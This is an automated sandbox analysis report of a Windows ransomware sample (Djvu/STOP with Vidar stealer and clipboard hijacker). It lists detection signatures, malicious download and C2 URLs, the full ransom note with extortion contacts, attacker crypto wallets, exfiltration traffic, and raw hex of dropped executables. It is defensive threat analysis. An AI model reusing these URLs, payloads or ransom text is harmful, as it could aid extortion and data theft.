Windows Analysis Report
U59WtZz2Sg.exe

Overview

General Information

Sample Name: U59WtZz2Sg.exe
Analysis ID: 756302
MD5: 41001fdd7879ce9ede214e92c7e492be
SHA1: 215964b0399da37b41b7f420806a72feb72a7c28
SHA256: aaef58ede9edbfc0cbbdd3dc7abfa9ae0f977ed1b33af4f5d7665123187801d1
Tags: exeTeamBot
Infos:

Detection

Babuk, Clipboard Hijacker, Djvu, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found ransom note / readme
Yara detected Babuk Ransomware
Antivirus detection for URL or domain
Yara detected Clipboard Hijacker
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Djvu Ransomware
Yara detected Vidar stealer
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Injects a PE file into a foreign processes
Writes many files with high entropy
Writes a notice file (html or txt) to demand a ransom
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
Drops certificate files (DER)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Uses cacls to modify the permissions of files
Contains functionality to launch a program with higher privileges
Found evaded block containing many API calls
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to query network adapater information

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://uaery.top/dl/build2.exeJ_ Avira URL Cloud: Label: malware
Source: http://fresherlights.com/files/1/build3.exerun Avira URL Cloud: Label: malware
Source: http://fresherlights.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=trueW Avira URL Cloud: Label: malware
Source: http://fresherlights.com/files/1/build3.exe( Avira URL Cloud: Label: malware
Source: http://uaery.top/dl/build2.exe Avira URL Cloud: Label: malware
Source: http://uaery.top/dl/build2.exe$run Avira URL Cloud: Label: malware
Source: http://fresherlights.com/test1/get.php Avira URL Cloud: Label: malware
Source: http://fresherlights.com/files/1/build3.exe$run Avira URL Cloud: Label: malware
Source: http://fresherlights.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=true Avira URL Cloud: Label: malware
Source: http://uaery.top/dl/build2.exerunk6 Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: U59WtZz2Sg.exe Virustotal: Detection: 36% Perma Link
Multi AV Scanner detection for domain / URL
Source: uaery.top Virustotal: Detection: 21% Perma Link
Source: fresherlights.com Virustotal: Detection: 18% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build2[1].exe ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build3[1].exe ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe ReversingLabs: Detection: 92%
Machine Learning detection for sample
Source: U59WtZz2Sg.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 14.0.mstsca.exe.ee0000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen8
Source: 14.2.mstsca.exe.ee0000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen8
Source: 11.2.build3.exe.b90000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen8
Source: 11.0.build3.exe.b90000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen8
Source: 00000000.00000002.305141359.0000000002220000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Djvu {"Download URLs": ["http://uaery.top/dl/build2.exe", "http://fresherlights.com/files/1/build3.exe"], "C2 url": "http://fresherlights.com/test1/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-5UcwRdS3ED\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@fishmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0609djfsieE", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local
Source: 0000000A.00000000.347600742.0000000000400000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": "https://t.me/asifrazatg", "Botnet": "517"}
Source: 5.3.U59WtZz2Sg.exe.3060000.0.raw.unpack Malware Configuration Extractor: Clipboard Hijacker {"Crypto Addresses": ["DBbgRYaKG993LFJKCWz73PZqveWsnwRmGc", "3NLzE3tXwoagBrgFsjNNkPZfrESydTD8JP", "MBD2C8QV7RDrNtSDRe9B2iH5r7yH4iMcxk", "ltc1qa5lae8k7tzcw5lcjfvfs3n0nhf0z3cgrsz2dym", "addr1qx4jwm700r2w6fneakg0r5pkg76vu7qkt6qv7zxza3qu3w9tyahu77x5a5n8nmvs78grv3a5eeupvh5qeuyv9mzpezuq60zykl", "0xa6360e294DfCe4fE4Edf61b170c76770691aA111", "42UxohbdHGMYGPvW5Uep45Jt9Rj2WvTV958B5G5vHnawZhA4UwoD53Tafn6GRmcGdoSFUfCQN6Xm37LBZZ6qNBorFw3b6s2", "89SPVUAPHDLSq5pRdf8Eo6SLnKRJ8BNSYYnvPL6iJxGP4FBCBmkeV3CTSLCbk6uydxRnub4gLH6TBRycxSAQN2m1KcnhrSZ", "LLiNjWA9h4LxVtDigLQ79xQdGiJYC4oHis", "t1VQgJMcNsBHsDyu1tXmJZjDpgbm3ftmTGN", "bnb136ns6lfw4zs5hg4n85vdthaad7hq5m4gtkgf23", "Ae2tdPwUPEZDqNhACJ3ZT5NdVjkNffGAwa4Mc9N95udKWYzt1VnFngLMnPE", "1My2QNmVqkvN5M13xk8DWftjwC9G1F2w8Z", "bc1qx8vykfse9s9llguez9cuyjmy092yeqkesl2r5v"]}
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext, 1_2_0040E870
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext, 1_2_0040EAA0
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext, 1_2_00410FC0
Source: U59WtZz2Sg.exe, 00000005.00000003.540487888.00000000031B4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY-----
Uses 32bit PE files
Source: U59WtZz2Sg.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\_readme.txt Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\_readme.txt Jump to behavior
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49702 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49703 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: U59WtZz2Sg.exe, U59WtZz2Sg.exe, 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000003.00000002.318481347.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000004.00000002.362805036.0000000002280000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: C:\gahu\juviru.pdb source: U59WtZz2Sg.exe, U59WtZz2Sg.exe, 00000000.00000000.295248076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000000.00000002.304266676.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000001.00000000.300308286.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000003.00000000.308700520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000003.00000002.318011527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000004.00000000.310209669.0000000000401000.00000020.00000001.01000000.00000005.sdmp, U59WtZz2Sg.exe, 00000004.00000002.344696539.0000000000401000.00000020.00000001.01000000.00000005.sdmp, U59WtZz2Sg.exe, 00000005.00000000.313385446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000005.00000003.388604495.0000000003060000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dismhost.pdbGCTL source: U59WtZz2Sg.exe, 00000005.00000003.378308612.0000000003077000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dismhost.pdb source: U59WtZz2Sg.exe, 00000005.00000003.378308612.0000000003077000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 9`C:\rena52\buvicaduyaf\hurujof wac\huriyav\jufi.pdb0h source: U59WtZz2Sg.exe, 00000005.00000003.440565184.0000000003060000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: U59WtZz2Sg.exe, 00000000.00000002.305141359.0000000002220000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000003.00000002.318481347.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000004.00000002.362805036.0000000002280000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: C:\rena52\buvicaduyaf\hurujof wac\huriyav\jufi.pdb source: U59WtZz2Sg.exe, 00000005.00000003.440565184.0000000003060000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: #C:\gahu\juviru.pdb0f source: U59WtZz2Sg.exe, 00000000.00000000.295248076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000000.00000002.304266676.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000001.00000000.300308286.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000003.00000000.308700520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000003.00000002.318011527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000004.00000000.310209669.0000000000401000.00000020.00000001.01000000.00000005.sdmp, U59WtZz2Sg.exe, 00000004.00000002.344696539.0000000000401000.00000020.00000001.01000000.00000005.sdmp, U59WtZz2Sg.exe, 00000005.00000000.313385446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000005.00000003.388604495.0000000003060000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_00403341 GetModuleHandleW,GetNamedPipeHandleStateW,InterlockedExchange,GetConsoleAliasExesLengthW,EnumCalendarInfoW,InterlockedCompareExchange,GetConsoleTitleA,GetLogicalDriveStringsW,FlushFileBuffers,GetShortPathNameA,GetComputerNameExA,CopyFileW,CloseHandle,LoadLibraryA,InterlockedIncrement,InterlockedIncrement,GetCharWidthA,CreateNamedPipeW,WinHttpSetOption,GlobalFlags,FindFirstVolumeA,CreateJobObjectA,GetModuleHandleW,FindResourceA,GetHandleInformation,CancelTimerQueueTimer,VerifyVersionInfoA,InterlockedIncrement,GetCommandLineA,SearchPathA,WriteConsoleOutputA,GetCPInfoExW,GetBinaryTypeA, 0_2_00403341
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose, 1_2_00410160
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose, 1_2_0040F730

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.5:51441 -> 8.8.8.8:53
Source: Traffic Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.5:49705 -> 116.121.62.237:80
Source: Traffic Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.5:49705 -> 116.121.62.237:80
Source: Traffic Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 222.236.49.123:80 -> 192.168.2.5:49704
Source: Traffic Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.5:49706 -> 222.236.49.123:80
Source: Traffic Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.5:49706 -> 222.236.49.123:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://fresherlights.com/test1/get.php
Source: Malware configuration extractor URLs: https://t.me/asifrazatg
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /517 HTTP/1.1Host: 88.198.94.71
Source: global traffic HTTP traffic detected: GET /176356074953.zip HTTP/1.1Host: 88.198.94.71Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----1417805488924803Host: 88.198.94.71Content-Length: 131097Connection: Keep-AliveCache-Control: no-cache
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 29 Nov 2022 23:22:17 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Last-Modified: Tue, 29 Nov 2022 16:00:02 GMTETag: "40800-5ee9e14abb179"Accept-Ranges: bytesContent-Length: 264192Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 72 d7 f5 25 36 b6 9b 76 36 b6 9b 76 36 b6 9b 76 8b f9 0d 76 37 b6 9b 76 28 e4 0e 76 27 b6 9b 76 28 e4 18 76 5f b6 9b 76 11 70 e0 76 31 b6 9b 76 36 b6 9a 76 ae b6 9b 76 28 e4 1f 76 14 b6 9b 76 28 e4 0f 76 37 b6 9b 76 28 e4 0a 76 37 b6 9b 76 52 69 63 68 36 b6 9b 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d1 57 0d 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 0a 01 00 00 48 06 00 00 00 00 00 97 4e 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 60 07 00 00 04 00 00 4b 2c 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc 0c 01 00 50 00 00 00 00 30 07 00 90 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2d 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 34 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b8 09 01 00 00 10 00 00 00 0a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 08 01 06 00 00 20 01 00 00 ca 02 00 00 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 90 2f 00 00 00 30 07 00 00 30 00 00 00 d8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 29 Nov 2022 23:22:26 GMTServer: Apache/2.4.37 (Win64) PHP/5.6.40Last-Modified: Sat, 31 Jul 2021 08:44:14 GMTETag: "2600-5c86757379380"Accept-Ranges: bytesContent-Length: 9728Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b1 8e c0 9c f5 ef ae cf f5 ef ae cf f5 ef ae cf ae 87 af ce f0 ef ae cf f5 ef af cf ff ef ae cf 6f 81 a7 ce f0 ef ae cf 6f 81 ac ce f4 ef ae cf 52 69 63 68 f5 ef ae cf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 bc 80 04 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 12 00 00 00 12 00 00 00 00 00 00 fa 1a 00 00 00 10 00 00 00 30 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 00 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc 3a 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 2c 02 00 00 d0 39 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ab 10 00 00 00 10 00 00 00 12 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 de 0b 00 00 00 30 00 00 00 0c 00 00 00 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 2c 02 00 00 00 50 00 00 00 04 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 